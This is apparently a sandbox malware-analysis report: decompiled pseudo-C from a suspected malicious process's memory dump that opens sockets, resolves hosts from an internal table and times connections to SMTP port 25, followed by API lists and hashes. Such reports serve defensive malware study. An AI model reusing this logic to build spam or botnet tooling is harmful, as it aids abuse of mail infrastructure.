                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				char* _t42;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(6);
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				_push(2); // executed
                                                                                                                                                                                                                                                                            				L0400101E(); // executed
                                                                                                                                                                                                                                                                            				_v20 = __eax;
                                                                                                                                                                                                                                                                            				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_v36 = 2;
                                                                                                                                                                                                                                                                            					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					L04001030();
                                                                                                                                                                                                                                                                            					_v34 = 2;
                                                                                                                                                                                                                                                                            					_push(_a4); // executed
                                                                                                                                                                                                                                                                            					L04001018(); // executed
                                                                                                                                                                                                                                                                            					_v12 = 2;
                                                                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                                                                            						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					_v13 = 0;
                                                                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                                                                            					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                            						_push(0x10);
                                                                                                                                                                                                                                                                            						_t42 =  &_v36;
                                                                                                                                                                                                                                                                            						_push(_t42);
                                                                                                                                                                                                                                                                            						_push(_v20); // executed
                                                                                                                                                                                                                                                                            						L04001036(); // executed
                                                                                                                                                                                                                                                                            						if(_t42 != 0) {
                                                                                                                                                                                                                                                                            							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v13 = 1;
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if(_a16 != 0) {
                                                                                                                                                                                                                                                                            							_v44 = _a16;
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1005);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20); // executed
                                                                                                                                                                                                                                                                            							L0400102A(); // executed
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1006);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20); // executed
                                                                                                                                                                                                                                                                            							L0400102A(); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _v20;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t40 = _v20;
                                                                                                                                                                                                                                                                            					_push(_t40); // executed
                                                                                                                                                                                                                                                                            					L04001000(); // executed
                                                                                                                                                                                                                                                                            					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v20;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x04001166
                                                                                                                                                                                                                                                                            0x04001168
                                                                                                                                                                                                                                                                            0x0400116a
                                                                                                                                                                                                                                                                            0x0400116c
                                                                                                                                                                                                                                                                            0x04001171
                                                                                                                                                                                                                                                                            0x04001178
                                                                                                                                                                                                                                                                            0x04001187
                                                                                                                                                                                                                                                                            0x0400118f
                                                                                                                                                                                                                                                                            0x04001190
                                                                                                                                                                                                                                                                            0x04001195
                                                                                                                                                                                                                                                                            0x0400119c
                                                                                                                                                                                                                                                                            0x0400119d
                                                                                                                                                                                                                                                                            0x040011a2
                                                                                                                                                                                                                                                                            0x040011a9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040011ba
                                                                                                                                                                                                                                                                            0x040011b5
                                                                                                                                                                                                                                                                            0x040011c2
                                                                                                                                                                                                                                                                            0x040011c9
                                                                                                                                                                                                                                                                            0x040011cd
                                                                                                                                                                                                                                                                            0x040011df
                                                                                                                                                                                                                                                                            0x040011e7
                                                                                                                                                                                                                                                                            0x040011e9
                                                                                                                                                                                                                                                                            0x040011ec
                                                                                                                                                                                                                                                                            0x040011f0
                                                                                                                                                                                                                                                                            0x040011f1
                                                                                                                                                                                                                                                                            0x040011f8
                                                                                                                                                                                                                                                                            0x040011dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040011dc
                                                                                                                                                                                                                                                                            0x040011fa
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040011fa
                                                                                                                                                                                                                                                                            0x04001208
                                                                                                                                                                                                                                                                            0x0400121c
                                                                                                                                                                                                                                                                            0x04001221
                                                                                                                                                                                                                                                                            0x04001224
                                                                                                                                                                                                                                                                            0x04001229
                                                                                                                                                                                                                                                                            0x0400122a
                                                                                                                                                                                                                                                                            0x0400122f
                                                                                                                                                                                                                                                                            0x04001237
                                                                                                                                                                                                                                                                            0x04001238
                                                                                                                                                                                                                                                                            0x0400123d
                                                                                                                                                                                                                                                                            0x04001242
                                                                                                                                                                                                                                                                            0x04001243
                                                                                                                                                                                                                                                                            0x04001248
                                                                                                                                                                                                                                                                            0x04001250
                                                                                                                                                                                                                                                                            0x04001251
                                                                                                                                                                                                                                                                            0x04001251
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001256
                                                                                                                                                                                                                                                                            0x0400120a
                                                                                                                                                                                                                                                                            0x0400120d
                                                                                                                                                                                                                                                                            0x0400120e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001213
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                                                                                                            • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 530611402-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                            • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                                                                            			E04001490() {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                                                            				intOrPtr _v528;
                                                                                                                                                                                                                                                                            				intOrPtr _v532;
                                                                                                                                                                                                                                                                            				intOrPtr _v536;
                                                                                                                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                                                                                                                            				intOrPtr _v544;
                                                                                                                                                                                                                                                                            				char _v548;
                                                                                                                                                                                                                                                                            				char _v552;
                                                                                                                                                                                                                                                                            				long _v556;
                                                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 3;
                                                                                                                                                                                                                                                                            				_v528 = 0;
                                                                                                                                                                                                                                                                            				while(_v528 < 3) {
                                                                                                                                                                                                                                                                            					_v532 = 0;
                                                                                                                                                                                                                                                                            					while(_v532 < 0x46) {
                                                                                                                                                                                                                                                                            						E04001260(_t40,  &_v524, 0, 0x200);
                                                                                                                                                                                                                                                                            						_v544 = E04001430(0x64);
                                                                                                                                                                                                                                                                            						_v540 = E04001430(7);
                                                                                                                                                                                                                                                                            						_t40 = E04001160(_v540,  *((intOrPtr*)(0x4088c00 + _v540 * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                            						_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                                            						_v536 = _t40;
                                                                                                                                                                                                                                                                            						if(_v536 == 0xffffffff) {
                                                                                                                                                                                                                                                                            							Sleep(1); // executed
                                                                                                                                                                                                                                                                            							_v532 = _v532 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							E040013B0( &_v524, _v544); // executed
                                                                                                                                                                                                                                                                            							 *0x400304c( &_v524, 0x4003134);
                                                                                                                                                                                                                                                                            							_v556 = GetTickCount();
                                                                                                                                                                                                                                                                            							E040010E0(_v536,  &_v524, _v544); // executed
                                                                                                                                                                                                                                                                            							_v548 = 0;
                                                                                                                                                                                                                                                                            							_v552 = 0;
                                                                                                                                                                                                                                                                            							E04001040(_v536,  &_v524, 0x200,  &_v548,  &_v552); // executed
                                                                                                                                                                                                                                                                            							_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                                            							_v8 = _v552 - _v556 + _v8;
                                                                                                                                                                                                                                                                            							_push(_v536); // executed
                                                                                                                                                                                                                                                                            							L04001000(); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t40 = _v528 + 1;
                                                                                                                                                                                                                                                                            					_v528 = _v528 + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				return _v8 / 3;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x04001499
                                                                                                                                                                                                                                                                            0x040014a0
                                                                                                                                                                                                                                                                            0x040014a7
                                                                                                                                                                                                                                                                            0x040014c2
                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x040014ea
                                                                                                                                                                                                                                                                            0x04001505
                                                                                                                                                                                                                                                                            0x04001517
                                                                                                                                                                                                                                                                            0x04001527
                                                                                                                                                                                                                                                                            0x04001544
                                                                                                                                                                                                                                                                            0x04001549
                                                                                                                                                                                                                                                                            0x0400154c
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x0400160f
                                                                                                                                                                                                                                                                            0x040014e4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400155f
                                                                                                                                                                                                                                                                            0x0400156d
                                                                                                                                                                                                                                                                            0x04001581
                                                                                                                                                                                                                                                                            0x0400158d
                                                                                                                                                                                                                                                                            0x040015a8
                                                                                                                                                                                                                                                                            0x040015b0
                                                                                                                                                                                                                                                                            0x040015ba
                                                                                                                                                                                                                                                                            0x040015e5
                                                                                                                                                                                                                                                                            0x040015ea
                                                                                                                                                                                                                                                                            0x040015fc
                                                                                                                                                                                                                                                                            0x04001605
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x040014b9
                                                                                                                                                                                                                                                                            0x040014bc
                                                                                                                                                                                                                                                                            0x040014bc
                                                                                                                                                                                                                                                                            0x04001622
                                                                                                                                                                                                                                                                            0x0400162d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                              • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                            • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                            • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E040014B3() {
                                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                                                                            					_t38 =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t70 - 0x20c)) =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t70 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t70 - 0x210)) = 0;
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						while( *((intOrPtr*)(_t70 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                                            							E04001260(_t38, _t70 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t70 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                                            							 *(_t70 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                                            							_t38 = E04001160( *(_t70 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t70 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                            							_t72 = _t72 + 0x24;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t70 - 0x214)) = _t38;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                                            								L7:
                                                                                                                                                                                                                                                                            								Sleep(1); // executed
                                                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t70 - 0x210)) =  *((intOrPtr*)(_t70 - 0x210)) + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                                                            								E040013B0(_t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                                            								 *0x400304c(_t70 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t70 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                                            								E040010E0( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t70 - 0x220)) = 0;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t70 - 0x224)) = 0;
                                                                                                                                                                                                                                                                            								E04001040( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208, 0x200, _t70 - 0x220, _t70 - 0x224); // executed
                                                                                                                                                                                                                                                                            								 *(_t70 - 4) =  *((intOrPtr*)(_t70 - 0x224)) -  *((intOrPtr*)(_t70 - 0x228)) +  *(_t70 - 4);
                                                                                                                                                                                                                                                                            								_push( *((intOrPtr*)(_t70 - 0x214))); // executed
                                                                                                                                                                                                                                                                            								L04001000(); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					return  *(_t70 - 4) / 3;
                                                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x040014b3
                                                                                                                                                                                                                                                                            0x040014b3
                                                                                                                                                                                                                                                                            0x040014b3
                                                                                                                                                                                                                                                                            0x040014b9
                                                                                                                                                                                                                                                                            0x040014bc
                                                                                                                                                                                                                                                                            0x040014c2
                                                                                                                                                                                                                                                                            0x040014c9
                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040014ea
                                                                                                                                                                                                                                                                            0x04001505
                                                                                                                                                                                                                                                                            0x04001517
                                                                                                                                                                                                                                                                            0x04001527
                                                                                                                                                                                                                                                                            0x04001544
                                                                                                                                                                                                                                                                            0x04001549
                                                                                                                                                                                                                                                                            0x0400154c
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x0400160d
                                                                                                                                                                                                                                                                            0x0400160f
                                                                                                                                                                                                                                                                            0x040014db
                                                                                                                                                                                                                                                                            0x040014e4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400155f
                                                                                                                                                                                                                                                                            0x0400155f
                                                                                                                                                                                                                                                                            0x0400156d
                                                                                                                                                                                                                                                                            0x04001581
                                                                                                                                                                                                                                                                            0x0400158d
                                                                                                                                                                                                                                                                            0x040015a8
                                                                                                                                                                                                                                                                            0x040015b0
                                                                                                                                                                                                                                                                            0x040015ba
                                                                                                                                                                                                                                                                            0x040015e5
                                                                                                                                                                                                                                                                            0x040015fc
                                                                                                                                                                                                                                                                            0x04001605
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x0400161a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400161a
                                                                                                                                                                                                                                                                            0x0400161f
                                                                                                                                                                                                                                                                            0x04001622
                                                                                                                                                                                                                                                                            0x0400162d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400162d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                              • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                            • Opcode ID: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                                            • Instruction ID: efc04feaa42e0dd8c691736b9f02f641cbb91c62c4f6f354fde5ae11d8ba4a5d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 423132B5D41218ABEB20EFA4DC89BD973B4AB18308F0482D5E5197A181E6756F84CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E040014DB() {
                                                                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t71 - 0x210)) =  *((intOrPtr*)(_t71 - 0x210)) + 1;
                                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t71 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                                            							L5:
                                                                                                                                                                                                                                                                            							E04001260(_t38, _t71 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t71 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                                            							 *(_t71 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                                            							_t45 = E04001160( *(_t71 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t71 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                                            							_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t71 - 0x214)) = _t45;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t71 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                                            								L7:
                                                                                                                                                                                                                                                                            								Sleep(1); // executed
                                                                                                                                                                                                                                                                            								goto L0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                                                            								E040013B0(_t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                                            								 *0x400304c(_t71 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t71 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                                            								E040010E0( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t71 - 0x220)) = 0;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t71 - 0x224)) = 0;
                                                                                                                                                                                                                                                                            								E04001040( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208, 0x200, _t71 - 0x220, _t71 - 0x224); // executed
                                                                                                                                                                                                                                                                            								_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                                            								 *(_t71 - 4) =  *((intOrPtr*)(_t71 - 0x224)) -  *((intOrPtr*)(_t71 - 0x228)) +  *(_t71 - 4);
                                                                                                                                                                                                                                                                            								_push( *((intOrPtr*)(_t71 - 0x214))); // executed
                                                                                                                                                                                                                                                                            								L04001000(); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						L1:
                                                                                                                                                                                                                                                                            						_t38 =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t71 - 0x20c)) =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t71 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t71 - 0x210)) = 0;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                                                                            						return  *(_t71 - 4) / 3;
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x040014db
                                                                                                                                                                                                                                                                            0x040014db
                                                                                                                                                                                                                                                                            0x040014db
                                                                                                                                                                                                                                                                            0x040014e4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040014ea
                                                                                                                                                                                                                                                                            0x040014ea
                                                                                                                                                                                                                                                                            0x040014f1
                                                                                                                                                                                                                                                                            0x040014f7
                                                                                                                                                                                                                                                                            0x04001505
                                                                                                                                                                                                                                                                            0x04001517
                                                                                                                                                                                                                                                                            0x04001527
                                                                                                                                                                                                                                                                            0x04001544
                                                                                                                                                                                                                                                                            0x04001549
                                                                                                                                                                                                                                                                            0x0400154c
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x0400160d
                                                                                                                                                                                                                                                                            0x0400160f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400155f
                                                                                                                                                                                                                                                                            0x0400155f
                                                                                                                                                                                                                                                                            0x0400156d
                                                                                                                                                                                                                                                                            0x04001581
                                                                                                                                                                                                                                                                            0x0400158d
                                                                                                                                                                                                                                                                            0x040015a8
                                                                                                                                                                                                                                                                            0x040015b0
                                                                                                                                                                                                                                                                            0x040015ba
                                                                                                                                                                                                                                                                            0x040015e5
                                                                                                                                                                                                                                                                            0x040015ea
                                                                                                                                                                                                                                                                            0x040015fc
                                                                                                                                                                                                                                                                            0x04001605
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x04001606
                                                                                                                                                                                                                                                                            0x04001559
                                                                                                                                                                                                                                                                            0x0400161a
                                                                                                                                                                                                                                                                            0x040014b3
                                                                                                                                                                                                                                                                            0x040014b9
                                                                                                                                                                                                                                                                            0x040014bc
                                                                                                                                                                                                                                                                            0x040014c2
                                                                                                                                                                                                                                                                            0x040014c9
                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x00000000
